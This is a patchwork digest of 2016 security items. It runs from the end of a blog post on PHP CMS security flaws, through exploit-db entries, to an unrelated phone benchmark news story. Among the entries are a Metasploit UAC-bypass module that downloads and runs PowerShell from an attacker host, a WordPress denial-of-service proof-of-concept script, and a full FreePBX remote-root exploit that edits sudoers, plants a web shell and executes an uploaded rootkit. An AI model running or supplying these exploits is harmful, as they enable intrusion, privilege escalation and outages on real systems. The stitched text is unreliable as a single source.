Consequently, HashPassword can be greatly simplified to the following snippet: function HashPassword($password) { if ( strlen( $password ) > 4096 ) { return '*'; } /* these steps are skipped */ $random = $this->get_random_bytes(6); $hash = $this->crypt_private($password, $this->gensalt_private($random)); if (strlen($hash) == 34) return $hash; return '*'; } One reason for this deviation from Phpass was to gracefully handle corner cases where someone downgrades to a version of PHP too old to support bcrypt without losing the ability to verify existing password hashes. Security Deficits in Joomla's Core Joomla Does Not Offer Automatic Updates Joomla doesn't offer automatic security updates. In the event that a security vulnerability is discovered in Joomla and a fix is released, it's up to every individual Joomla site operator to validate and install the update manually. Until the patch is applied, your systems are vulnerable. As a consequence, most Joomla websites still run outdated versions of Joomla. Joomla Doesn't Provide Prepared Statements To reiterate: Prepared statements are a way of interacting with a database that, among other things, makes preventing SQL injection simple while eliminating corner cases. Note: Thanks to Mark Babker, this will be fixed in a future version of Joomla. As of 3.6.2, out of Joomla's database drivers, only the PDO driver attempts to support prepared statements. Unfortunately, it is not successful due to a poorly thought out default setting in PHP itself: In order to use actual prepared statements, you have to disable emulated prepared statements. Instead of this: $pdo = new PDO(/* ... */); Do this: $pdo = (new PDO(/* ... */)) // Turn off emulated prepares. ->setAttribute(PDO::ATTR_EMULATE_PREPARES, false) // Optional, but also recommended: ->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION) ; As long as the developers working with Joomla's PDO database driver take care to disable emulation, Joomla offers prepared statements. 
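As an added illustration of the three-step exchange described above and of the PDO setting the article recommends (example code written for this post, not Joomla's or Paragon's): the DSN, credentials and the `users` table are placeholders, and the two lookup functions are hypothetical names.

```php
<?php
declare(strict_types=1);

/*
 * Added example: the same lookup done escape-then-concatenate and done with a
 * native prepared statement. DSN, credentials and the `users` table are
 * placeholders (assumptions), not values from any real deployment.
 */

function connect(): PDO
{
    $pdo = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8mb4', 'app', 'secret');

    // With emulation on (PHP's default), PDO escapes the bound values itself
    // and splices them into the SQL text before sending ONE string to MySQL,
    // i.e. escape-then-concatenate by another name. With it off, prepare()
    // sends the query text with placeholders and execute() sends the values
    // in a separate protocol packet, so the values can never be parsed as SQL.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $pdo;
}

// Escape-then-concatenate: the parameter becomes part of the query text, so
// the server must re-parse untrusted data as SQL and the escaping routine has
// to be right for the connection's charset. Shown only for contrast.
function findUserConcatenated(PDO $pdo, string $email): ?array
{
    $sql = 'SELECT id, email FROM users WHERE email = ' . $pdo->quote($email);
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Native prepared statement: step 1 is prepare(), which ships the query text
// with a placeholder and receives a statement handle; step 3 is execute(),
// which ships the handle plus the parameter. No escaping happens in PHP.
function findUserPrepared(PDO $pdo, string $email): ?array
{
    $stmt = $pdo->prepare('SELECT id, email FROM users WHERE email = :email');
    $stmt->bindValue(':email', $email, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// A value containing a quote character needs no special handling on the
// prepared path; it is matched literally against the column.
$pdo = connect();
var_dump(findUserPrepared($pdo, "o'brien@example.com"));
```

Run it against a MySQL server with the query log enabled and the two functions show up differently: the concatenated one arrives as a single query string with the value inlined, the prepared one as a Prepare followed by an Execute.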
However, this security property isn't included out-of-the-box, and as of 3.6.2, doesn't apply to the default MySQLi driver.

Joomla Doesn't Employ Context-Aware Output Escaping

Modern web applications use templating engines, such as Twig, which provide context-aware output escaping features to mitigate cross-site scripting vulnerabilities. For example, in the following code snippet, user_data.title will be escaped differently than user_data.body, particularly with respect to quote characters.

<span title="{{ user_data.title|e('html_attr') }}">{{ user_data.body|e('html') }}</span>

Instead, Joomla just blacklists HTML tags in an attempt to prevent the low-hanging fruit. Security experts refer to this as enumerating badness, which is listed as one of the six dumbest ideas in computer security.

Security Deficits in Drupal's Core

Drupal Does Not Offer Automatic Updates

Drupal doesn't offer automatic security updates. In the event that a security vulnerability is discovered in Drupal and a fix is released, it's up to every individual Drupal site operator to validate and install the update manually. Until the patch is applied, your systems are vulnerable. This has already happened once before.

Possibly due to the existence of a historical precedent, some of the Drupal core members are seriously working towards implementing secure automatic updates into Drupal. We've offered the team members some guidance on how to proceed (i.e. since libsodium isn't currently an option for most of their userbase, they're stuck with RSA signatures, which even developers with cryptography experience frequently implement incorrectly).

Drupal Almost Offers Prepared Statements

...except Drupal goes out of its way to use emulated prepared statements instead of actual prepared statements, even though emulated prepared statements suffer from the same fundamental security problem as escaping then concatenating strings. Code and data separation is not upheld.

Drupal Uses SHA512Crypt, Which Is Sub-Optimal

There's minor disagreement among cryptographers about which password hashing functions will remain strong against hash cracking in the coming years. Of all the acceptable options, PBKDF2 is certainly the weakest one, and SHA512Crypt is very similar to PBKDF2-SHA512 for practical purposes.

Drupal supports a minimum of PHP 5.5, which means they could just as easily migrate to password_hash() and password_verify(), since those functions are guaranteed to exist. If PHP adopts Argon2i in a future version, Drupal will automatically support it as soon as it becomes the default, with no further code changes necessary.

Everything is Going to Be Okay

All of these security flaws baked into the cornerstones of the software that powers one third of websites on the Internet can be very discouraging. Fortunately, most of these problems are fixable. Refer to how we solved each problem in CMS Airship, for example.

Unfortunately, there are a lot of nontechnical obstacles in the way of making WordPress, Drupal, and Joomla more secure. WordPress developers proudly boast that WordPress powers 1 in 4 websites, and pride themselves on supporting unsupported versions of PHP as a "usability" feature rather than a security liability that could potentially break the Internet for everyone.

At the end of the day, there are two ways to solve this dilemma:
1. Get the core teams for each large CMS project to take security seriously.
2. Migrate towards a CMS project that already takes security seriously.

We leave answering which solution is better as an exercise for the reader. We're actively pursuing both goals in the hopes that one will move the needle towards a more secure Internet.

About the Author
P.I.E. Staff, Paragon Initiative Enterprises
Paragon Initiative Enterprises is an Orlando-based company that provides software consulting, application development, code auditing, and security engineering services. We specialize in PHP Security and applied cryptography.

Source: https://paragonie.com/blog/2016/08/on-insecurity-popular-open-source-php-cms-platforms
9. ChimeraPE

chimera_pe

ChimeraPE demo: maps another executable into the target process and runs both. This is an alternative method to the classic RunPE (process hollowing) that can be used in case we want to run the original exe as well.

WARNING: This is a 32-bit version. 64-bit variant coming soon.

Link: https://github.com/hasherezade/demos/tree/master/chimera_pe
10. Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::EXE
  include Post::File
  include Post::Windows::Priv
  include Post::Windows::Runas
  include Post::Windows::Registry
  include Post::Windows::Powershell

  def initialize(info={})
    super( update_info(info,
      'Name'           => 'Windows Escalate UAC Protection Bypass with Fileless',
      'Description'    => %q{
        This module will bypass Windows UAC by utilizing eventvwr.exe and
        hijacking entries registry on Windows.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Matt Graeber',
        'Enigma0x3',
        'Pablo Gonzalez' # Port to local exploit
      ],
      'Platform'       => [ 'win' ],
      'SessionTypes'   => [ 'meterpreter' ],
      'Targets'        => [
        [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
        [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
      ],
      'DefaultTarget'  => 0,
      'References'     => [
        [ 'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/' ],
        [ 'URL', 'http://www.elladodelmal.com/2016/08/como-ownear-windows-7-y-windows-10-con.html' ],
      ],
      'DisclosureDate' => "Aug 15 2016"
    ))

    register_options([
      OptString.new('FILE_DYNAMIC_PAYLOAD', [true, 'Payload PSH Encoded will be generated here (Not include webserver path)']),
      OptString.new('IPHOST', [true, 'IP WebServer where File Payload will be downloaded']),
      OptBool.new('LOCAL', [true, 'File Payload is in this machine?', true]),
    ])
  end

  def check_permissions!
    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end

  def exploit
    validate_environment!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good 'UAC is set to Default'
      print_good 'BypassUAC can bypass this setting, continuing...'
    when UAC_NO_PROMPT
      print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
      runas_method
      return
    end

    keys = registry_enumkeys('HKCU\Software\Classes\mscfile\shell\open\command')
    if keys == nil
      print_good("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command not exist!")
    end
    key = registry_createkey('HKCU\Software\Classes\mscfile\shell\open\command')
    reg = "IEX (New-Object Net.WebClient).DownloadString(\'http://#{datastore['IPHOST']}/#{datastore['FILE_DYNAMIC_PAYLOAD']}\')"
    command = cmd_psh_payload(payload.encoded, 'x86', {:remove_comspec => true, :encode_final_payload => true})

    if datastore['LOCAL']
      if File.exists?("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}")
        File.delete("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}")
      end
      file_local_write("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}", command)
    end

    result = registry_setvaldata('HKCU\Software\Classes\mscfile\shell\open\command', 'bypass', 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C ' + reg, 'REG_SZ')
    if result
      execute_script("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")
      print_good('Created registry entries to hijack!')
    end

    r = session.sys.process.execute("cmd.exe /c c:\\windows\\system32\\eventvwr.exe", nil, {'Hidden' => true, 'Channelized' => true})
    check_permissions!
  end

  def validate_environment!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? or is_system?

    winver = sysinfo['OS']
    unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
    end

    if is_uac_enabled?
      print_status 'UAC is Enabled, checking level...'
    else
      if is_in_admin_group?
        fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end
  end
end

Source: https://www.exploit-db.com/exploits/40268/
11. WordPress 4.5.3 - Directory Traversal / Denial of Service

Path traversal vulnerability in WordPress Core Ajax handlers

Abstract
A path traversal vulnerability was found in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site.

Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID
OVE-20160712-0036

See also
- CVE-2016-6896
- CVE-2016-6897
- #37490 - Improve capability checks in wp_ajax_update_plugin() and wp_ajax_delete_plugin()

Tested versions
This issue was successfully tested on WordPress version 4.5.3.

Fix
WordPress version 4.6 mitigates this vulnerability by moving the CSRF check to the top of the affected method(s).

Introduction
WordPress is web software that can be used to create a website, blog, or app. A path traversal vulnerability exists in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site.

Details
The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin(). The function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal.

Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers. Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. More importantly, it also allows for a denial of service condition, as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block, and with it the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a WordPress site. It is also possible to trigger this issue via Cross-Site Request Forgery, as the nonce check is done too late in this case.

Proof of concept
The following Bash script can be used to trigger the denial of service condition.

#!/bin/bash
target="http://<target>"
username="subscriber"
password="password"
cookiejar=$(mktemp)

# login
curl --cookie-jar "$cookiejar" \
    --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \
    "$target/wp-login.php" \
    >/dev/null 2>&1

# exhaust apache
for i in `seq 1 1000`
do
    curl --cookie "$cookiejar" \
        --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \
        "$target/wp-admin/admin-ajax.php" \
        >/dev/null 2>&1 &
done

rm "$cookiejar"

Source: https://www.exploit-db.com/exploits/40288/
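The ordering problem the advisory describes, as an added example that is not WordPress's own code: a constructed, simplified Ajax handler in the vulnerable shape (file read before the nonce and capability checks) beside the same handler with the checks moved first, as the 4.6 fix does, plus a path containment check that goes beyond that fix. It assumes the WordPress functions it calls (check_ajax_referer, current_user_can, get_plugin_data, wp_send_json_*) are loaded; the demo_* names are hypothetical.

```php
<?php
/*
 * Added example (constructed, not WordPress's code): the same Ajax handler in
 * the vulnerable and in the hardened ordering. Assumes a loaded WordPress
 * environment; demo_* function names are hypothetical.
 */

// Vulnerable ordering: get_plugin_data() reads the file named by the client
// before the nonce and capability checks, so any logged-in user reaches the
// read, and "../" sequences in $plugin walk out of WP_PLUGIN_DIR.
function demo_ajax_update_plugin_vulnerable(): void
{
    $plugin = urldecode($_POST['plugin'] ?? '');
    $status = array('plugin' => $plugin);

    // Reachable by a Subscriber; a path such as ../../dev/random blocks here.
    $status['pluginName'] = get_plugin_data(WP_PLUGIN_DIR . '/' . $plugin)['Name'];

    check_ajax_referer('updates');
    if (!current_user_can('update_plugins')) {
        wp_send_json_error($status);
    }
    // ... perform the update ...
    wp_send_json_success($status);
}

// Hardened ordering: authorisation first, then input validation, then I/O.
function demo_ajax_update_plugin_fixed(): void
{
    // 1. CSRF (nonce) and capability checks before any work on user input.
    //    This reordering is what the 4.6 fix does.
    check_ajax_referer('updates');
    if (!current_user_can('update_plugins')) {
        wp_send_json_error(array('error' => 'insufficient permissions'));
    }

    // 2. Canonicalise the requested path and refuse anything that is not a
    //    regular file inside the plugin directory (extra containment check).
    $plugin = urldecode($_POST['plugin'] ?? '');
    $path = demo_contained_plugin_path(WP_PLUGIN_DIR, $plugin);
    if ($path === null) {
        wp_send_json_error(array('error' => 'invalid plugin path'));
    }

    // 3. Only now touch the filesystem.
    $status = array(
        'plugin'     => $plugin,
        'pluginName' => get_plugin_data($path)['Name'],
    );
    // ... perform the update ...
    wp_send_json_success($status);
}

/**
 * Resolve $relative under $base and return the canonical path, or null when
 * it does not exist, escapes $base, or is not a regular file (a device node
 * such as /dev/random is refused even if a symlink inside $base points at it).
 */
function demo_contained_plugin_path(string $base, string $relative): ?string
{
    $baseReal = realpath($base);
    $fileReal = realpath($base . '/' . $relative);
    if ($baseReal === false || $fileReal === false) {
        return null;
    }
    // Require the resolved file to sit strictly below the resolved base.
    if (strpos($fileReal, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($fileReal) ? $fileReal : null;
}
```

Because wp_send_json_error() terminates the request, each rejected branch stops before the file read; the containment helper can be unit-tested on its own with a temporary directory.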
12. FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation

#!/usr/bin/env python
# -*- coding: latin-1 -*-
################################################################################
#
# DESCRIPTION
# FreePBX 13 remote root 0day - Found and exploited by pgt @ nullsecurity.net
#
# AUTHOR
# pgt - nullsecurity.net
#
# DATE
# 8-12-2016
#
# VERSION
# freepbx0day.py 0.1
#
# AFFECTED VERSIONS
# FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26)
#
# STATUS
# Fixed 08-10-2016 - http://issues.freepbx.org/browse/FREEPBX-12908
#
# TESTED AGAINST
# * http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso
# * http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso
#
# TODO
# * SSL support (priv8)
# * parameter for TCP port
#
# HINT
# Base64 Badchars: '+', '/', '='
#
################################################################################

'''
Successful exploitation should looks like:

[*] enum FreePBX version
[+] target running FreePBX 13
[*] checking if target is vulnerable
[+] target seems to be vulnerable
[*] getting kernel version
[!] Kernel: Linux localhost.localdomain 2.6.32-504.8.1.el6.x86_64 ....
[+] Linux x86_64 platform
[*] adding 'echo "asterisk ALL=(ALL) NOPASSWD:...' to freepbx_engine
[*] triggering incrond to gaining root permissions via sudo
[*] waiting 20 seconds while incrond restarts applications - /_!_\ VERY LOUD!
[*] removing 'echo "asterisk ALL=(ALL) NOPASSWD:...' from freepbx_engine
[*] checking if we gained root permissions
[!] w00tw00t w3 r r00t - uid=0(root) gid=0(root) groups=0(root)
[+] adding view.php to admin/.htaccess
[*] creating upload script: admin/libraries/view.php
[*] uploading ${YOUR_ROOTKIT} to /tmp/23 via admin/libraries/view.php
[*] removing view.php from admin/.htaccess
[*] rm -f admin/libraries/view.php
[!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23
[*] removing 'asterisk ALL=(ALL) NOPASSWD:ALL' from /etc/sudoers
[*] removing all temp files
[!] have fun and HACK THE PLANET!
'''

import base64
import httplib
import optparse
import re
from socket import *
import sys
import time

BANNER = '''\033[0;31m
################################################################################
#___________ ________________________ ___ ____________ #
#\_ _____/______ ____ ____\______ \______ \ \/ / /_ \_____ \ #
# | __) \_ __ \_/ __ \_/ __ \| ___/| | _/\ / | | _(__ < #
# | \ | | \/\ ___/\ ___/| | | | \/ \ | |/ \ #
# \___ / |__| \___ >\___ >____| |______ /___/\ \ |___/______ / #
# \/ \/ \/ \/ \_/ \/ #
# _______ .___ #
# \ _ \ __| _/____ ___.__. * Remote Root 0-Day #
# / /_\ \ ______ / __ |\__ \< | | #
# \ \_/ \ /_____/ / /_/ | / __ \ \___ | #
# \_____ / \____ |(____ / ____| #
# \/ \/ \/\/ #
# #
# * Remote Command Execution Exploit (FreePBX 14 is affected also) #
# * Local Root Exploit (probably FreePBX 14 is also exploitable) #
# * Backdoor Upload + Execute As Root #
# #
# * Author: pgt - nullsecurity.net #
# * Version: 0.1 #
# #
################################################################################
\033[0;m'''


def argspage():
    parser = optparse.OptionParser()
    parser.add_option('-u', default=False, metavar='<url>',
                      help='ip/url to exploit')
    parser.add_option('-r', default=False, metavar='<file>',
                      help='Linux 32bit bd/rootkit')
    parser.add_option('-R', default=False, metavar='<file>',
                      help='Linux 64bit bd/rootkit')
    parser.add_option('-a', default='/', metavar='<path>',
                      help='FreePBX path - default: \'/\'')
    args, args2 = parser.parse_args()

    if (args.u == False) or (args.r == False) or (args.R == False):
        print ''
        parser.print_help()
        print '\n'
        exit(0)

    return args


def cleanup_fe():
    print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \
          '\' from freepbx_engine'
    cmd = 'sed -i -- \' /echo \"asterisk ALL=(ALL) NOPASSWD\:ALL\">>' \
          '\/etc\/sudoers/d\' /var/lib/asterisk/bin/freepbx_engine'
    command_execution(cmd)
    return


def cleanup_lr():
    print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \
          '\' from launch-restapps'
    cmd = 'sed -i -- \':r;$!{N;br};s/\\necho "asterisk.*//g\' ' \
          'modules/restapps/launch-restapps.sh'
    command_execution(cmd)
    return


def cleanup_htaccess():
    print '[*] removing view.php from admin/.htaccess'
    cmd = 'sed -i -- \'s/config\\\\.php|view\\\\.php|ajax\\\\.php/' \
          'config\\\\.php|ajax\\\\.php/g\' .htaccess'
    command_execution(cmd)
    return


def cleanup_view_php():
    print '[*] rm -f admin/libraries/view.php'
    cmd = 'rm -f libraries/view.php'
    command_execution(cmd)
    return


def cleanup_sudoers():
    print '[*] removing \'asterisk ALL=(ALL) NOPASSWD:ALL\' from /etc/sudoers'
    cmd = 'sudo sed -i -- \'/asterisk ALL=(ALL) NOPASSWD:ALL/d\' /etc/sudoers'
    command_execution(cmd)
    return


def cleanup_tmpfiles():
    print '[*] removing all temp files'
    cmd = 'find / -name *w00t* -exec rm -f {} \; 2> /dev/null'
    command_execution(cmd)
    return


def check_platform(response):
    if (response.find('Linux') != -1) and (response.find('x86_64') != -1):
        print '[+] Linux x86_64 platform'
        return '64'
    elif (response.find('Linux') != -1) and (response.find('i686') != -1):
        print '[+] Linux i686 platform'
        cleanup_tmpfiles()
        sys.exit(1)
        return '32'
    else:
        print '[-] adjust check_platform() when you want to backdoor ' \
              'other platforms'
        cleanup_tmpfiles()
        sys.exit(1)


def check_kernel(response):
    if response.find('w00t') != -1:
        start = response.find('w00t') + 4
        end = response.find('w00tw00t') - 1
        print '[!] Kernel: %s' % (response[start:end].replace('\\', ''))
        return check_platform(response[start:end])


def check_root(response):
    if response.find('uid=0(root)') != -1:
        start = response.find('w00t') + 4
        end = response.find('w00tw00t') - 2
        print '[!] w00tw00t w3 r r00t - %s' % (response[start:end])
        return
    else:
        print '[-] we are not root :('
        cleanup_fe()
        cleanup_lr()
        cleanup_tmpfiles()
        sys.exit(1)


def build_request(filename):
    body = 'file=%s&name=a&codec=gsm&lang=ru&temporary=1' \
           '&command=convert&module=recordings' % (filename)
    content_type = 'application/x-www-form-urlencoded; charset=UTF-8'
    return content_type, body


def filter_filename(response):
    start = response.find('localfilename":"w00t') + 16
    end = response.find('.wav') + 4
    return response[start:end]


def post(path, content_type, body):
    h = httplib.HTTP(ARGS.u)
    h.putrequest('POST', '%s%s' % (ARGS.a, path))
    h.putheader('Host', '%s' % (ARGS.u))
    h.putheader('Referer', 'http://%s/' % (ARGS.u))
    h.putheader('Content-Type', content_type)
    h.putheader('Content-Length', str(len(body)))
    h.endheaders()
    h.send(body)
    errcode, errmsg, headers = h.getreply()
    return h.file.read()


def encode_multipart_formdata(fields, filename=None):
    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
    CRLF = '\r\n'
    L = []
    L.append('--' + LIMIT)
    if fields:
        for (key, value) in fields.items():
            L.append('Content-Disposition: form-data; name="%s"' % key)
            L.append('')
            L.append(value)
            L.append('--' + LIMIT)
    if filename == None:
        L.append('Content-Disposition: form-data; name="file"; filename="dasd"')
        L.append('Content-Type: audio/mpeg')
        L.append('')
        L.append('da')
    else:
        L.append('Content-Disposition: form-data; name="file"; filename="dasd"')
        L.append('Content-Type: application/octet-stream')
        L.append('')
        L.append(open_file(filename))
    L.append('--' + LIMIT + '--')
    L.append('')
    body = CRLF.join(L)
    content_type = 'multipart/form-data; boundary=%s' % (LIMIT)
    return content_type, body


def create_fields(payload):
    fields = {'id': '1',
              'name': 'aaaa',
              'extension': '0',
              'language': 'ru',
              'systemrecording': '',
              'filename': 'w00t%s' % (payload)}
    return fields


def command_execution(cmd):
    upload_path = 'admin/ajax.php?module=recordings&command=' \
                  'savebrowserrecording'
    cmd = base64.b64encode(cmd)
    payload = '`echo %s | base64 -d | sh`' % (cmd)
    fields = create_fields(payload)
    content_type, body = encode_multipart_formdata(fields)
    response = post(upload_path, content_type, body)
    filename = filter_filename(response)
    content_type, body = build_request(filename)
    return post('admin/ajax.php', content_type, body)


def check_vuln():
    h = httplib.HTTP(ARGS.u)
    h.putrequest('GET', '%sadmin/ajax.php' % (ARGS.a))
    h.putheader('Host', '%s' % (ARGS.u))
    h.endheaders()
    errcode, errmsg, headers = h.getreply()
    response = h.file.read()
    if response.find('{"error":"ajaxRequest declined - Referrer"}') == -1:
        print '[-] target seems not to be vulnerable'
        sys.exit(1)

    upload_path = 'admin/ajax.php?module=recordings&command' \
                  '=savebrowserrecording'
    payload = 'w00tw00t'
    fields = create_fields(payload)
    content_type, body = encode_multipart_formdata(fields)
    response = post(upload_path, content_type, body)
    if response.find('localfilename":"w00tw00tw00t') != -1:
        print '[+] target seems to be vulnerable'
        return
    else:
        print '[-] target seems not to be vulnerable'
        sys.exit(1)


def open_file(filename):
    try:
        f = open(filename, 'rb')
        file_content = f.read()
        f.close()
        return file_content
    except IOError:
        print '[-] %s does not exists!' % (filename)
        sys.exit(1)


def version13():
    print '[*] checking if target is vulnerable'
    check_vuln()

    print '[*] getting kernel version'
    cmd = 'uname -a; echo w00tw00t'
    response = command_execution(cmd)
    result = check_kernel(response)
    if result == '64':
        backdoor = ARGS.R
    elif result == '32':
        backdoor = ARGS.r

    print '[*] adding \'echo "asterisk ALL=(ALL) NOPASSWD:...\' ' \
          'to freepbx_engine'
    cmd = 'sed -i -- \'s/Com Inc./Com Inc.\\necho "asterisk ALL=\(ALL\)\ ' \
          'NOPASSWD\:ALL"\>\>\/etc\/sudoers/g\' /var/lib/' \
          'asterisk/bin/freepbx_engine'
    command_execution(cmd)

    print '[*] triggering incrond to gaining root permissions via sudo'
    cmd = 'echo a > /var/spool/asterisk/sysadmin/amportal_restart'
    command_execution(cmd)

    print '[*] waiting 20 seconds while incrond restarts applications' \
          ' - /_!_\\ VERY LOUD!'
    time.sleep(20)

    cleanup_fe()
    #cleanup_lr()

    print '[*] checking if we gained root permissions'
    cmd = 'sudo -n id; echo w00tw00t'
    response = command_execution(cmd)
    check_root(response)

    print '[+] adding view.php to admin/.htaccess'
    cmd = 'sed -i -- \'s/config\\\\.php|ajax\\\\.php/' \
          'config\\\\.php|view\\\\.php|ajax\\\\.php/g\' .htaccess'
    command_execution(cmd)

    print '[*] creating upload script: admin/libraries/view.php'
    cmd = 'echo \'<?php move_uploaded_file($_FILES["file"]' \
          '["tmp_name"], "/tmp/23");?>\' > libraries/view.php'
    command_execution(cmd)

    print '[*] uploading %s to /tmp/23 via ' \
          'admin/libraries/view.php' % (backdoor)
    content_type, body = encode_multipart_formdata(False, backdoor)
    post('admin/libraries/view.php', content_type, body)

    cleanup_htaccess()
    cleanup_view_php()

    print '[!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1;' \
          ' rm -f /tmp/23'
    cmd = 'chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23'
    setdefaulttimeout(5)
    try:
        command_execution(cmd)
    except timeout:
        ''' l4zY w0rk '''
        setdefaulttimeout(20)
        try:
            cleanup_sudoers()
            cleanup_tmpfiles()
        except timeout:
            cleanup_tmpfiles()
    return


def enum_version():
    h = httplib.HTTP(ARGS.u)
    h.putrequest('GET', '%sadmin/config.php' % (ARGS.a))
    h.putheader('Host', '%s' % (ARGS.u))
    h.endheaders()
    errcode, errmsg, headers = h.getreply()
    response = h.file.read()
    if response.find('FreePBX 13') != -1:
        print '[+] target running FreePBX 13'
        return 13
    else:
        print '[-] target is not running FreePBX 13'
        return False


def checktarget():
    if re.match(r'^[0-9.\-]*$', ARGS.u):
        target = ARGS.u
    else:
        try:
            target = gethostbyname(ARGS.u)
        except gaierror:
            # name resolution failed: there is no target to connect to
            print '[-] \'%s\' is unreachable' % (ARGS.u)
            sys.exit(1)

    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(5)
    result = sock.connect_ex((target, 80))
    sock.close()
    if result != 0:
        print '[-] \'%s\' is unreachable' % (ARGS.u)
        sys.exit(1)
    return


def main():
    print BANNER
    checktarget()
    open_file(ARGS.r)
    open_file(ARGS.R)
    print '[*] enum FreePBX version'
    result = enum_version()
    if result == 13:
        version13()
    print '[!] have fun and HACK THE PLANET!'
    return


if __name__ == '__main__':
    ARGS = argspage()
    try:
        main()
    except KeyboardInterrupt:
        print '\nbye bye!!!'
        time.sleep(0.01)
        sys.exit(1)

#EOF

Source: https://www.exploit-db.com/exploits/40232/
  13. Cisco ASA / PIX - Privilege Escalation (EPICBANANA)

# Exploit Title: Cisco ASA / PIX - Privilege Escalation (EPICBANANA)
# Date: 19-08-2016
# Exploit Author: Shadow Brokers
# Vendor Homepage: http://www.cisco.com/

Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40271.zip

Source: https://www.exploit-db.com/exploits/40271/
  14. Cisco ASA 8.x - Authentication Bypass (EXTRABACON)

# Exploit Title: Cisco ASA 8.X Authentication Bypass
# Date: 17-08-2016
# Exploit Author: Equation Group
# Vendor Homepage: Cisco
# Software Link: Cisco
# Version: Cisco ASA 8.X
# Tested on: Cisco ASA 8.4.2
# CVE : Not sure

Requirements:
* SNMP read (public) string
* Access to SNMP service
* SSH port accessible

Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40258.zip

Source: https://www.exploit-db.com/exploits/40258/
  15. Samsung's latest top smartphone, the Galaxy Note 7, loses its match against the iPhone 6S by a wide margin when it comes to app launch speed.

The Galaxy Note 7 is a freshly launched flagship. The iPhone 6S will soon have been on the market for a year. Even so, Apple's smartphone proves much faster than the phablet Samsung has just launched, News.ro writes.

The test published on YouTube by PhoneBuff measured only the speed at which the same set of apps and games open on the two phones. In total, the two devices were timed opening 14 apps and games. In the end, the iPhone 6S finished the test after 1 minute and 21 seconds. The Galaxy Note 7 needed 2 minutes and 4 seconds. The biggest difference between the two devices was in games, which started significantly faster on the iPhone 6S than on the Galaxy Note 7.

